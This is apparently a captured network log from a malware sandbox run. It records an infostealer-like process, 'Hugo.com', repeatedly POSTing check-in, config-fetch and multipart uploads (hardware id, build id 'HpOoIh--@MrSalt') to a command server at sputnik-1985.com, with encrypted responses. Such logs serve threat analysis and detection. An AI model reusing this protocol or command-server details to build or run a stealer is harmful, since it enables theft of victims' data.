                                                                                                                                                                                                            Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.650737104.21.64.14436596C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-07 14:45:56 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-07 14:45:56 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                            2025-01-07 14:45:57 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Tue, 07 Jan 2025 14:45:57 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=ih6100gfefhbh1uc5lba182bj0; expires=Sat, 03 May 2025 08:32:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZISyoiXRe40EUviUlpgRIK5Vp2Crfflo4lMQ6ZxYVPZPqTsrj6oZHPRHOnwFzqPEwwHdcjvpt7JAHUubKODiJHfEXuS%2BNZMIXIdV%2B5dHVv6Mn5UJ9Lg9pX7gwtZDVBB8oy5I"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8fe4bc06bbd64414-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2432&min_rtt=2382&rtt_var=929&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=1225860&cwnd=180&unsent_bytes=0&cid=b20f39fd5d6603db&ts=343&x=0"
                                                                                                                                                                                                            2025-01-07 14:45:57 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                            2025-01-07 14:45:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.650738104.21.64.14436596C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-07 14:45:57 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 81
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-07 14:45:57 UTC81OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 4d 72 53 61 6c 74 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@MrSalt&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                                                                                                                                            2025-01-07 14:45:58 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Tue, 07 Jan 2025 14:45:58 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=g1tg1gk9609abbf1di81of3o5l; expires=Sat, 03 May 2025 08:32:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6LAmIeCSW55UzbRvEklx1K%2BNKg8QljistdC9GuOY3%2BAXOuL493a9fbDx2lXQpfbqMjubMYou5%2F42zNlcNm%2FGSR6ODfluLenaItNaqNQb7yxLo2PNHXzkBF%2Fzk%2Fln8brHPUA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8fe4bc0bdd1142e9-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1753&min_rtt=1739&rtt_var=662&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=981&delivery_rate=1679125&cwnd=240&unsent_bytes=0&cid=fb35a493f2329bcb&ts=500&x=0"
                                                                                                                                                                                                            2025-01-07 14:45:58 UTC242INData Raw: 32 64 39 38 0d 0a 78 6b 56 56 54 62 4c 41 56 76 79 57 41 65 31 56 75 76 53 2b 73 51 57 67 2b 6c 4e 46 62 72 55 79 72 2b 65 2f 6a 77 53 76 50 34 53 39 5a 79 4e 76 69 50 52 36 33 75 56 6b 7a 32 2f 63 6c 64 4c 43 59 49 7a 59 4d 69 46 4d 6a 31 54 4f 69 38 7a 71 4b 49 31 4a 36 65 52 2f 4d 79 7a 65 73 7a 50 51 74 47 53 56 64 34 43 76 78 5a 4e 67 7a 74 68 70 5a 77 76 66 55 4d 36 4c 33 65 35 76 77 45 2f 6f 70 53 30 35 4b 74 71 6c 4e 5a 6a 33 62 59 41 77 33 35 48 66 32 32 76 4a 6c 7a 73 6f 54 4a 6b 51 79 70 32 64 74 53 62 69 57 76 43 6e 43 44 51 2b 32 65 49 72 30 4f 30 6a 69 44 75 59 7a 70 7a 51 59 4d 4b 57 4e 53 45 46 33 56 72 48 67 39 7a 72 62 74 39 57 34 71 34 74 4e 79 6e 62 72 7a 79 4d 2b 6d 65 48 4f 39 6d 62 33 35 4d 70
                                                                                                                                                                                                            Data Ascii: 2d98xkVVTbLAVvyWAe1VuvS+sQWg+lNFbrUyr+e/jwSvP4S9ZyNviPR63uVkz2/cldLCYIzYMiFMj1TOi8zqKI1J6eR/MyzeszPQtGSVd4CvxZNgzthpZwvfUM6L3e5vwE/opS05KtqlNZj3bYAw35Hf22vJlzsoTJkQyp2dtSbiWvCnCDQ+2eIr0O0jiDuYzpzQYMKWNSEF3VrHg9zrbt9W4q4tNynbrzyM+meHO9mb35Mp
                                                                                                                                                                                                            2025-01-07 14:45:58 UTC1369INData Raw: 67 70 38 70 5a 31 53 58 41 2f 2b 47 7a 50 78 7a 77 45 33 67 35 44 68 35 4e 70 43 6c 4f 4e 36 73 49 34 63 37 31 70 50 66 33 47 44 44 6d 43 4d 6f 44 4e 52 59 78 59 48 58 34 6d 6e 43 55 2b 79 6a 4c 7a 34 6f 33 36 55 38 6d 50 74 67 7a 33 6d 59 6b 63 53 54 50 34 4b 34 49 53 51 50 77 31 33 63 78 63 4b 6a 66 34 31 61 36 75 52 2f 64 79 6e 65 6f 7a 6d 65 35 6d 75 45 50 4e 32 45 31 39 70 71 7a 35 67 38 4c 51 50 55 55 4d 71 50 31 2b 4a 73 79 56 44 72 6f 69 63 33 62 35 37 69 4d 34 61 30 4f 38 38 55 33 59 62 62 33 33 47 41 6f 6e 45 34 51 73 34 51 79 6f 6d 64 74 53 62 46 57 4f 57 6e 4c 44 67 73 32 4b 6b 6d 6e 75 5a 6c 67 6a 4c 4b 6b 4e 6e 64 62 63 47 4b 4f 79 6b 4b 31 46 6e 47 6a 4e 6a 71 59 6f 30 54 70 71 4d 2f 64 33 65 51 67 7a 6d 56 2b 47 6d 59 4e 35 69 4a 6b 73 6f
                                                                                                                                                                                                            Data Ascii: gp8pZ1SXA/+GzPxzwE3g5Dh5NpClON6sI4c71pPf3GDDmCMoDNRYxYHX4mnCU+yjLz4o36U8mPtgz3mYkcSTP4K4ISQPw13cxcKjf41a6uR/dyneozme5muEPN2E19pqz5g8LQPUUMqP1+JsyVDroic3b57iM4a0O88U3Ybb33GAonE4Qs4QyomdtSbFWOWnLDgs2KkmnuZlgjLKkNndbcGKOykK1FnGjNjqYo0TpqM/d3eQgzmV+GmYN5iJkso
                                                                                                                                                                                                            2025-01-07 14:45:58 UTC1369INData Raw: 53 38 4a 31 6c 72 48 78 5a 4f 74 59 64 55 64 76 75 51 57 49 43 53 53 6c 7a 65 51 2b 6d 53 5a 64 38 66 59 78 5a 4e 67 7a 74 68 70 5a 77 48 66 56 63 69 4b 33 4f 64 6f 79 46 66 71 72 43 6b 30 50 64 2b 6d 4e 4a 4c 38 61 59 49 35 33 4a 37 56 32 47 7a 45 6d 44 41 74 54 4a 6b 51 79 70 32 64 74 53 62 35 57 75 71 70 4b 48 55 61 30 36 77 36 6d 65 49 6a 6b 48 6e 42 31 74 76 66 4a 35 72 59 50 53 34 4d 33 46 72 4a 68 64 72 67 59 38 35 61 35 61 6b 67 50 53 48 58 70 6a 69 58 2b 57 57 50 4d 4e 79 54 7a 74 5a 75 7a 70 52 78 61 55 7a 51 53 49 33 64 6e 63 4a 68 32 31 37 4a 70 7a 59 2b 62 38 2f 73 4c 64 37 7a 62 38 39 76 6d 4a 48 5a 32 32 7a 45 6b 44 45 31 43 64 6c 62 7a 49 2f 62 37 47 76 42 57 2b 61 6c 4a 7a 45 6a 30 4b 55 7a 6a 4f 5a 6d 69 53 58 53 31 70 4b 54 59 4e 72 59
                                                                                                                                                                                                            Data Ascii: S8J1lrHxZOtYdUdvuQWICSSlzeQ+mSZd8fYxZNgzthpZwHfVciK3OdoyFfqrCk0Pd+mNJL8aYI53J7V2GzEmDAtTJkQyp2dtSb5WuqpKHUa06w6meIjkHnB1tvfJ5rYPS4M3FrJhdrgY85a5akgPSHXpjiX+WWPMNyTztZuzpRxaUzQSI3dncJh217JpzY+b8/sLd7zb89vmJHZ22zEkDE1CdlbzI/b7GvBW+alJzEj0KUzjOZmiSXS1pKTYNrY
                                                                                                                                                                                                            2025-01-07 14:45:58 UTC1369INData Raw: 73 51 6c 63 58 65 34 6d 2f 43 56 65 36 72 4b 44 4d 68 31 71 51 35 6d 2f 74 70 6e 54 2f 57 6d 39 66 63 62 4e 43 59 50 43 4d 41 30 31 6a 47 6a 35 32 6a 4a 73 70 46 70 76 78 6e 41 69 4c 66 6f 6a 65 49 74 48 7a 42 4c 70 69 52 30 4a 4d 2f 67 70 51 2f 4a 77 50 62 58 4d 61 4e 33 4f 46 6f 79 6c 6a 76 72 43 38 6c 4c 74 53 71 4e 5a 44 37 59 6f 73 79 33 5a 4c 62 31 32 48 4e 32 48 39 6e 43 38 38 51 6c 63 58 79 79 6c 4f 50 66 4e 7a 6b 4f 48 6b 32 6b 4b 55 34 33 71 77 6a 67 7a 54 55 6e 74 50 56 62 73 36 53 4f 43 77 41 33 46 54 42 6a 4e 6a 72 5a 38 68 59 35 36 41 72 50 53 6e 54 6f 54 75 52 2b 32 76 50 65 5a 69 52 78 4a 4d 2f 67 72 30 6d 4c 41 4c 52 45 4e 4c 4c 78 4b 31 68 77 52 32 2b 35 43 73 2b 4b 64 61 6e 4f 4a 2f 79 61 34 6f 2f 33 4a 66 61 31 57 54 4e 6e 44 51 6d 41
                                                                                                                                                                                                            Data Ascii: sQlcXe4m/CVe6rKDMh1qQ5m/tpnT/Wm9fcbNCYPCMA01jGj52jJspFpvxnAiLfojeItHzBLpiR0JM/gpQ/JwPbXMaN3OFoyljvrC8lLtSqNZD7Yosy3ZLb12HN2H9nC88QlcXyylOPfNzkOHk2kKU43qwjgzTUntPVbs6SOCwA3FTBjNjrZ8hY56ArPSnToTuR+2vPeZiRxJM/gr0mLALRENLLxK1hwR2+5Cs+KdanOJ/ya4o/3Jfa1WTNnDQmA
                                                                                                                                                                                                            2025-01-07 14:45:58 UTC1369INData Raw: 4b 33 76 39 6e 77 46 62 30 6f 79 67 7a 4b 4e 79 6b 4f 35 6a 31 5a 6f 55 37 33 35 50 58 33 47 75 43 31 6e 45 67 46 4a 63 49 6a 61 76 57 2f 6e 48 4f 55 2b 32 79 50 48 63 77 6e 72 74 30 6d 66 67 6a 31 33 66 62 6e 64 66 58 5a 38 36 59 4e 53 6f 4d 78 56 2f 4b 67 74 54 6d 64 4d 64 61 34 61 38 76 50 43 44 57 73 44 69 51 35 6d 61 64 4a 5a 6a 59 6e 4e 52 2f 67 73 42 78 45 51 76 48 51 4d 37 48 37 50 74 6c 32 31 62 72 71 47 63 6f 59 63 6e 69 4d 35 4b 30 4f 38 38 78 31 35 2f 66 33 47 62 4c 6c 44 77 69 42 64 4a 52 79 34 48 58 35 32 62 4c 57 2b 65 68 4c 54 51 75 32 71 73 7a 6c 76 4e 67 6e 58 65 57 31 74 76 4c 4a 35 72 59 47 43 41 65 32 55 43 4e 6d 70 50 30 4a 73 70 52 70 76 78 6e 4d 79 58 66 70 6a 4f 53 38 6d 61 4a 4f 74 6d 5a 33 64 4e 6f 78 70 4d 34 49 51 33 61 56 63
                                                                                                                                                                                                            Data Ascii: K3v9nwFb0oygzKNykO5j1ZoU735PX3GuC1nEgFJcIjavW/nHOU+2yPHcwnrt0mfgj13fbndfXZ86YNSoMxV/KgtTmdMda4a8vPCDWsDiQ5madJZjYnNR/gsBxEQvHQM7H7Ptl21brqGcoYcniM5K0O88x15/f3GbLlDwiBdJRy4HX52bLW+ehLTQu2qszlvNgnXeW1tvLJ5rYGCAe2UCNmpP0JspRpvxnMyXfpjOS8maJOtmZ3dNoxpM4IQ3aVc
                                                                                                                                                                                                            2025-01-07 14:45:58 UTC1369INData Raw: 59 63 45 64 76 75 51 6e 50 53 72 61 72 7a 65 52 39 33 47 4f 4d 63 71 57 30 64 6c 31 79 4a 4d 30 4b 67 48 61 55 38 75 44 31 75 46 30 78 46 33 6c 72 32 64 35 62 39 65 36 64 4d 61 30 51 4a 67 68 30 70 48 51 78 57 7a 44 6d 79 63 71 48 4a 63 65 6a 5a 54 61 2f 43 61 56 53 2f 61 7a 49 43 68 68 79 65 49 7a 6b 72 51 37 7a 7a 48 52 6b 4e 76 56 61 64 43 64 4e 79 67 44 33 6c 6e 4a 6a 64 37 74 59 73 6c 61 34 36 63 72 50 43 6a 54 72 54 43 58 2b 6d 71 41 64 35 62 57 32 38 73 6e 6d 74 67 51 50 41 2f 62 58 59 32 61 6b 2f 51 6d 79 6c 47 6d 2f 47 63 37 49 64 57 69 50 70 6a 77 5a 6f 6b 39 33 5a 62 58 30 47 6a 47 6e 6a 55 6f 44 4e 78 5a 7a 49 50 59 35 32 33 4c 55 4f 57 69 49 58 64 68 6b 4b 55 73 33 71 77 6a 72 79 7a 56 6d 74 75 54 65 49 79 42 63 53 41 41 6c 77 69 4e 6a 74 48
                                                                                                                                                                                                            Data Ascii: YcEdvuQnPSrarzeR93GOMcqW0dl1yJM0KgHaU8uD1uF0xF3lr2d5b9e6dMa0QJgh0pHQxWzDmycqHJcejZTa/CaVS/azIChhyeIzkrQ7zzHRkNvVadCdNygD3lnJjd7tYsla46crPCjTrTCX+mqAd5bW28snmtgQPA/bXY2ak/QmylGm/Gc7IdWiPpjwZok93ZbX0GjGnjUoDNxZzIPY523LUOWiIXdhkKUs3qwjryzVmtuTeIyBcSAAlwiNjtH
                                                                                                                                                                                                            2025-01-07 14:45:58 UTC1369INData Raw: 62 36 64 5a 7a 34 6f 79 37 4d 69 6b 2b 52 6b 7a 77 69 57 31 73 53 54 50 34 4b 74 4d 69 6b 43 30 45 62 63 79 50 72 37 62 4d 70 4e 34 62 4d 6f 64 32 47 51 70 48 54 47 70 79 33 50 4d 38 6e 57 68 49 4d 31 6d 63 31 69 63 46 79 46 54 34 4f 63 6e 66 73 6d 6c 51 2b 6f 35 44 56 33 64 35 44 6c 4e 34 7a 6d 5a 59 77 68 32 39 48 69 37 55 44 59 6c 54 63 77 48 65 6c 75 79 70 2f 51 36 33 48 63 45 66 4f 6e 4b 54 6b 6f 78 75 4a 36 33 76 73 6a 31 77 36 59 33 70 7a 73 4b 59 4b 41 63 58 39 4d 34 6c 50 44 69 39 72 37 64 34 42 36 2f 4b 6b 68 49 44 36 51 37 48 53 59 74 44 76 66 65 5a 69 53 7a 5a 4d 2f 6b 73 70 71 63 6c 2b 41 41 4a 2b 61 6b 2f 51 6d 32 78 32 2b 39 6d 6c 33 50 5a 44 36 64 4e 6e 33 63 5a 30 78 32 34 44 66 6c 46 6e 38 74 6a 59 68 43 64 42 41 6a 36 76 57 2b 57 47 4e
                                                                                                                                                                                                            Data Ascii: b6dZz4oy7Mik+RkzwiW1sSTP4KtMikC0EbcyPr7bMpN4bMod2GQpHTGpy3PM8nWhIM1mc1icFyFT4OcnfsmlQ+o5DV3d5DlN4zmZYwh29Hi7UDYlTcwHeluyp/Q63HcEfOnKTkoxuJ63vsj1w6Y3pzsKYKAcX9M4lPDi9r7d4B6/KkhID6Q7HSYtDvfeZiSzZM/kspqcl+AAJ+ak/Qm2x2+9ml3PZD6dNn3cZ0x24DflFn8tjYhCdBAj6vW+WGN
                                                                                                                                                                                                            2025-01-07 14:45:58 UTC1369INData Raw: 45 6e 4f 4e 2f 69 65 74 37 79 49 39 64 6c 6c 74 62 59 77 69 65 61 79 47 4e 38 57 59 51 48 6e 64 66 43 6f 33 2b 4e 53 36 62 38 64 58 6c 76 77 75 4a 73 33 72 4e 67 6e 53 58 65 6c 63 72 51 49 50 79 6d 46 69 6b 4c 31 6b 62 64 6b 74 4b 69 53 50 74 38 32 4a 6f 79 4e 43 48 65 70 53 4b 50 74 43 33 50 4f 4a 6a 4f 35 5a 4d 76 67 71 64 2f 5a 78 53 58 43 49 32 77 33 75 4e 6f 79 6b 76 33 36 51 41 35 4b 4e 47 30 4a 49 6e 37 4c 4b 45 42 2b 64 61 53 6b 32 47 43 77 47 4e 70 54 4e 4e 42 6a 64 32 4e 76 7a 32 59 44 72 48 30 64 53 68 68 79 65 49 69 33 71 77 78 77 58 66 4b 31 6f 53 54 49 4d 47 4b 49 79 45 50 77 56 4f 4b 75 2b 50 4b 61 4d 70 63 38 4c 51 71 4f 77 37 54 73 7a 36 67 79 6e 61 4d 4f 64 61 52 79 73 49 6e 6a 4e 67 2b 5a 31 54 75 45 49 58 46 34 71 4d 6d 31 52 32 2b 35
                                                                                                                                                                                                            Data Ascii: EnON/iet7yI9dlltbYwieayGN8WYQHndfCo3+NS6b8dXlvwuJs3rNgnSXelcrQIPymFikL1kbdktKiSPt82JoyNCHepSKPtC3POJjO5ZMvgqd/ZxSXCI2w3uNoykv36QA5KNG0JIn7LKEB+daSk2GCwGNpTNNBjd2Nvz2YDrH0dShhyeIi3qwxwXfK1oSTIMGKIyEPwVOKu+PKaMpc8LQqOw7Tsz6gynaMOdaRysInjNg+Z1TuEIXF4qMm1R2+5
                                                                                                                                                                                                            2025-01-07 14:45:58 UTC1369INData Raw: 68 72 7a 43 49 34 57 43 66 4d 4f 61 6f 38 63 46 67 30 70 74 7a 43 77 76 61 58 50 4f 37 36 76 78 68 33 52 2f 41 70 7a 45 30 62 35 37 69 4c 4e 36 73 49 36 49 6c 33 34 62 66 6b 55 76 46 6c 54 31 6e 45 35 6c 4a 6a 5a 4f 64 74 54 57 44 48 66 54 6b 66 33 64 6f 30 37 41 6d 6d 50 64 31 6a 48 44 6d 71 50 48 42 59 4e 4b 62 63 78 59 42 30 30 62 59 68 73 33 71 57 50 4e 77 39 4b 4d 33 4e 47 33 31 6d 48 61 76 34 6d 43 50 4f 64 2f 57 6b 70 4e 2f 67 73 42 78 43 68 37 51 51 4d 37 48 2b 4e 63 6b 2f 45 76 6c 70 43 6b 77 62 35 37 69 4f 4e 36 73 49 34 49 6c 33 34 62 66 6e 32 44 59 6e 33 45 34 51 73 34 51 32 38 57 46 76 69 69 4e 54 36 62 38 5a 33 41 68 33 61 4d 33 6b 50 64 78 6e 54 48 62 67 4e 2b 55 57 66 79 33 4f 69 59 63 32 6b 48 41 67 63 76 54 57 4f 70 62 34 36 4d 5a 43 52
                                                                                                                                                                                                            Data Ascii: hrzCI4WCfMOao8cFg0ptzCwvaXPO76vxh3R/ApzE0b57iLN6sI6Il34bfkUvFlT1nE5lJjZOdtTWDHfTkf3do07AmmPd1jHDmqPHBYNKbcxYB00bYhs3qWPNw9KM3NG31mHav4mCPOd/WkpN/gsBxCh7QQM7H+Nck/EvlpCkwb57iON6sI4Il34bfn2DYn3E4Qs4Q28WFviiNT6b8Z3Ah3aM3kPdxnTHbgN+UWfy3OiYc2kHAgcvTWOpb46MZCR


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.650739104.21.64.14436596C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-07 14:45:58 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=6H7HXKT5W9NQT
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 12831
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-07 14:45:58 UTC12831OUTData Raw: 2d 2d 36 48 37 48 58 4b 54 35 57 39 4e 51 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 44 42 37 38 36 34 35 39 37 35 44 33 31 30 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 36 48 37 48 58 4b 54 35 57 39 4e 51 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 48 37 48 58 4b 54 35 57 39 4e 51 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 4d 72 53 61 6c 74 0d 0a 2d 2d 36 48 37 48 58 4b 54 35 57
                                                                                                                                                                                                            Data Ascii: --6H7HXKT5W9NQTContent-Disposition: form-data; name="hwid"E7DB78645975D310822D1F4978021086--6H7HXKT5W9NQTContent-Disposition: form-data; name="pid"2--6H7HXKT5W9NQTContent-Disposition: form-data; name="lid"HpOoIh--@MrSalt--6H7HXKT5W
                                                                                                                                                                                                            2025-01-07 14:45:59 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Tue, 07 Jan 2025 14:45:59 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=f14pr2jg6odtl57g9co59vh4iq; expires=Sat, 03 May 2025 08:32:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BhE%2FirEj6qWzOh5FarvG7ytdbTOVhT97lARIzfwn488y8OECImWJ5tHn3s9UnWqB7blHkd2weUe0kpFfKbRbbz9IcIEOPXiXMUAuLPkgUAaw1DBCsCaZt23UTuKm2y%2FUj%2Fw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8fe4bc12dcfdc358-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1685&rtt_var=639&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13766&delivery_rate=1701631&cwnd=155&unsent_bytes=0&cid=c7a87ff9b1f224dc&ts=595&x=0"
                                                                                                                                                                                                            2025-01-07 14:45:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                            2025-01-07 14:45:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            4192.168.2.650740104.21.64.14436596C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-07 14:45:59 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=ETDM57XEJA
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 15059
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-07 14:45:59 UTC15059OUTData Raw: 2d 2d 45 54 44 4d 35 37 58 45 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 44 42 37 38 36 34 35 39 37 35 44 33 31 30 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 45 54 44 4d 35 37 58 45 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 54 44 4d 35 37 58 45 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 4d 72 53 61 6c 74 0d 0a 2d 2d 45 54 44 4d 35 37 58 45 4a 41 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                                            Data Ascii: --ETDM57XEJAContent-Disposition: form-data; name="hwid"E7DB78645975D310822D1F4978021086--ETDM57XEJAContent-Disposition: form-data; name="pid"2--ETDM57XEJAContent-Disposition: form-data; name="lid"HpOoIh--@MrSalt--ETDM57XEJAConten
                                                                                                                                                                                                            2025-01-07 14:46:00 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Tue, 07 Jan 2025 14:46:00 GMT
